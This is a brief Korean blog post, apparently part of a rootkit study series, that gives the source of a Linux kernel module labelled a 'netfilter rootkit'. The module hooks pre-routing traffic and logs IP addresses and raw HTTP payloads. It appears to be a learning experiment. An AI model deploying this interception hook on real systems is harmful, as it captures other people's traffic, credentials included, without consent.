SMALL
sk_buff에서 ip와 port 같은 내용을 추출할 수 있어서.. 간단하게 테스트해보니 되었다.
이러한 방식으로 데이터를 스니핑 할 수 있을 것 같다.
물론 정교하게 만들어야겠지만...
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
|
1,1 All
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/highmem.h>
#include <linux/skbuff.h>
#include <linux/in.h>
#include <linux/icmp.h>
#include <linux/ip.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/tcp.h> /*tcp_hdr*/
#define NIPQUAD(addr) \
((unsigned char *)&addr)[0], \
((unsigned char *)&addr)[1], \
((unsigned char *)&addr)[2], \
((unsigned char *)&addr)[3]
//function define
int rootkit_init(void);
void rootkit_exit(void);
module_init(rootkit_init);
module_exit(rootkit_exit);
unsigned int sniff(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
//nf_hook_ops
struct nf_hook_ops net_hook;
int rootkit_init(void) {
printk("Network Sniffing\n");
//setting pre_hook;
net_hook.hooknum = NF_INET_PRE_ROUTING;
net_hook.priority = NF_IP_PRI_FIRST;
net_hook.pf = PF_INET;
net_hook.hook = &sniff;
nf_register_hook(&net_hook);
return 1;
}
unsigned int sniff(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){
struct iphdr* iph = ip_hdr(skb);
struct tcphdr* htcp = tcp_hdr(skb);
int tcp_size = htcp->doff *4;
char* tcp_data = NULL;
/*tcp protocol check*/
if(iph->protocol == 6){
/*web port filter*/
if(ntohs(htcp->source) == 80 ||
ntohs(htcp->dest) ==80){
printk("tcp protocol\n");
printk(KERN_DEBUG "src address: %d.%d.%d.%d\n",NIPQUAD(iph->saddr));
printk(KERN_DEBUG "dst address: %d.%d.%d.%d\n",NIPQUAD(iph->daddr));
tcp_data = (char*)((unsigned char*)htcp + tcp_size);
printk("data\n%s\n",tcp_data);
}
}
return NF_ACCEPT;
}
void rootkit_exit(void) {
nf_unregister_hook(&net_hook);
}
MODULE_DESCRIPTION ("netfilter rootkit");
MODULE_LICENSE("GPL");
|
cs |
<데이터>
LIST
'reversing > rootkit' 카테고리의 다른 글
| Why use system call? (0) | 2018.03.12 |
|---|---|
| rootkit - packet sniff[1] (0) | 2017.06.21 |
| rootkit - packet sniff[0] (0) | 2017.06.21 |
| rootkit - root [2] (0) | 2017.06.13 |
| rootkit - root [1] (0) | 2017.06.02 |
